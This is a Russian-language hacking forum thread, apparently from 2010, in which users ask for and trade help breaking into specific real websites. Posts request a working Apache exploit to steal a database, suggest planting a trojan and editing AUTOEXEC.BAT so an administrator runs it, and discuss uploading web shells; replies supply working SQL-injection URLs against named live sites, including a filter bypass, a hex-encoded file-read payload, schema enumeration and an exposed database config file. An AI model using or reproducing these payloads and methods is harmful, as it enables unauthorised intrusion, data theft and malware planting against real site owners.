Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 679 of 1207
  1. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Apache/1.3.27 (Unix) (Red-Hat/Linux) FrontPage/5.0.2.2626 mod_ssl/2.8.12 OpenSSL/0.9.6b PHP/4.3.11 mod_perl/1.27 - вот такая система есть у меня. Апач довольно старый, подозреваю, что есть сплойты под него. Только найти не могу.
    фтп - Version wu-2.6.2(1)
    ssh - SSH-1.99-OpenSSH_3.1p1
    подкиньте идейку или рабочий сплойт. В идеале мне нужна MySQL база, но мскл инъекций на сайте не обнаружено. Если достану базу - отблагодарю
     
    #13561 DrakonSerg, 13 Jun 2010
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Попробуй в корень диска C:/ троян записать. Вдруг админ решит запустить. Или autoexec поправить.
     
    #13562 попугай, 13 Jun 2010
  3. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    47
    Likes Received:
    2
    Reputations:
    5
    подскажите пожалуйста как залить шелл.

    ситуация такая: mysql стоит на одной машинке, сайт на другой (хостинг) - есть sql-inj дырка. INTO OUTFILE применить не получится исходя из выше-сказанного (mysql на отдельной машине).

    по крайней мере пытался, но пишет:

    Error 1: Can't create/write to file '/var/www/пам/data/www/парам/uploads/shell.php' (Errcode: 2)
     
    #13563 exT1ma4ka, 13 Jun 2010
    Last edited: 13 Jun 2010
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Фильтруется select, как обойти?

    http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+
     
    #13564 FlaktW, 13 Jun 2010
  5. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    Ну в теории можно залить ***.exe в веб-папку + правка C:\AUTOEXEC.BAT возможна. Только это нужно троя искать/покупать не палящегося + заставить админа перезагрузить сервер.

    Попугай, тебе не нужен шелл? Мне лень возиться.
     
    #13565 qq6ka, 13 Jun 2010
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    select не фильтруется:

    Code:
    http://www.albumband.cz/pisen.php?id=1+and+substring((select+version()),1,1)=5
    фильтруется кое-что другое ;)
     
    #13566 Pashkela, 13 Jun 2010
    1 person likes this.
  7. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Code:
    http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,8
    upd: + читалка файлов в 8 поле
    Code:
    http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,0x2e2e2f706973656e2e706870
     
    #13567 RulleR, 13 Jun 2010
    Last edited: 13 Jun 2010
    3 people like this.
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Буду обращаться к вам за советами.
     
    #13568 FlaktW, 14 Jun 2010
  9. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    помогите расскрутить это
    http://www.hausderkunst.de/hdk.de/index.php?StoryID=-999999
     
    #13569 GOGA075, 14 Jun 2010
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ребят вот такой вопрос :

    имеется сервер Microsoft-IIS/7.0, язык asp

    База : PostgreSQL

    через функции Postgre хотел читать файл C:\boot.ini,файл не открылся..(strange strange strange)

    просто из за интереса попробовал читать файл /etc/passwd (ну я знаю что в винде такого нету)

    и файл открылся!!

    как это понять?

    реально ли использовать IIS под никcом??
     
    _________________________
    #13570 Konqi, 14 Jun 2010
  11. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    http://www.hausderkunst.de/hdk.de/index.php?StoryID=-2+union+select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+1,1--
    Перебирай limit'ом
     
    #13571 SeNaP, 14 Jun 2010
  12. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    как узнать полный путь в никсе имеется возможность читать файлы sql запросом?
     
    #13572 pinch, 14 Jun 2010
  13. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    google.ru
    site:yourvulnsite.com warning

    И в найденных ошибках будет путь
     
    #13573 wildshaman, 14 Jun 2010
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    вывод ошибок отключен + через google пробовал
     
    #13574 pinch, 14 Jun 2010
  15. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Попробовать найти phpinfo, пооткрывать просто .php файлы без параметров, попроболвать найти раскрытие путей - [] и так далее
     
    #13575 wildshaman, 14 Jun 2010
  16. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    сайт на asp, инклуда нет раскрытие тож
     
    #13576 pinch, 14 Jun 2010
  17. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    читай конфиги. Вот тема https://forum.antichat.ru/threadnav49775-4-10.html
     
    #13577 qq6ka, 14 Jun 2010
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    шаман это тот самый сайт o котором я писал выше,сайт на asp, нужно узнать полный путь чтоб залить шелл
     
    _________________________
    #13578 Konqi, 14 Jun 2010
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ты сам себе ответил.
    http://www.albumband.cz/mysql.cfg
    :D Давно такого не видел :)
     
    #13579 Ctacok, 14 Jun 2010
    Last edited: 14 Jun 2010
    4 people like this.
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Ctacok что предлагаешь? можно как-нибудь узнать путь до сайта?
     
    _________________________
    #13580 Konqi, 14 Jun 2010
(You must log in or sign up to post here.)
Page 679 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.